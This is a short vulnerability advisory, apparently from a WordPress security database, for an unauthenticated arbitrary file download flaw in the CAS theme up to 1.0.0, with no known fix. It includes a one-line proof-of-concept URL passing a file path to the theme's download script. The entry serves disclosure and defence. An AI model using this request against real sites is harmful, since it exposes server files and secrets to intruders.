Themes Vulnerabilities
CAS <= 1.0.0 - Unauthenticated Arbitrary File Access
Description
This theme does not validate the file path it builds from user input when serving downloads, allowing an unauthenticated user to download arbitrary files from the server.
Proof of Concept
https://example.com/wp-content/themes/cas/download.php?path=<<FILE_TO_DOWNLOAD>>
Affects Themes
No known fix
Classification
Type
LFI
Miscellaneous
Original Researcher
Aly Khaled Aly Abd Al-aal
Submitter
Aly Khaled Aly Abd Al-aal
Verified
Yes
Timeline
Publicly Published
2024-05-02
Added
2024-05-02
Last Updated
2024-05-02